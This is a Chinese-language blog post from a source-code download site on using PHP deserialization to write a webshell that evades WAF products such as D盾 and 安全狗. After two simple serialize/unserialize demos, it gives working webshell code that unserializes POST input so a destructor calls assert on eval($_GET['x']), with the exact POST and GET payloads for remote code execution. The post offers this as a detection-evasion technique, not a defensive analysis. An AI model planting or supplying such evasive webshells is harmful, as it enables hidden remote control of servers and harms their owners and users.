最新公告
  • 欢迎加入中国站长资源网团队,精品资源持续增加!立即加入我们
  • 利用PHP反序列化免杀D盾、安全狗等WAF软件

    PHP反序列化介绍

    在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾,过安全狗等WAF软件的效果。

    TestCode1:

    <?php
     
    class A{
        public $name = 'xxxx';
        
        function __destruct(){
            echo $this->name;
        }
    }
     
    echo serialize(new A());
     
    ?>

    输出:

    xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}

    TestCode2:

    <?php
     
    class A{
        public $name = 'xxxx';
        
        function __destruct(){
            echo $this->name;
        }
    }
     
    unserialize('O:1:"A":1:{s:4:"name";s:9:"wogaosuni";}');
     
    ?>

    输出:

    wogaosuni

    可以发现原来的变量已经被我们替换了。

    利用反序列化写马绕过D盾等WAF

    代码不做过多解释,啥子都能看明白

    <?php
     
    class A{
        public $name;
        public $male;
        
        function __destruct(){
            $a = $this->name;
            $a($this->male);
        }
    }
     
    unserialize($_POST['un']);
    ?>

    POST传参传入

    un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}

    GET传参传入:

    x=phpinfo();

    效果

    如果遇到资源下载失效,请复制当前文章链接类型客服处理!
    php85源码网 » 利用PHP反序列化免杀D盾、安全狗等WAF软件

    常见问题FAQ

    【点击查看】免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    【点击查看】提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    【点击查看】开通终身至尊下载源码 “不完整” 或 “不能用” 怎么办?
    非常抱歉,你有权利告诉本站,但是本站有选择处理或者不处理的权力,如无法接受请不要开通本站会员。
    【点击查看】开通终身会员能下载全站资源码?
    可以100%下载全站源码资源的,除部分失效资源,失效的可以联系客服尝试恢复。

    发表评论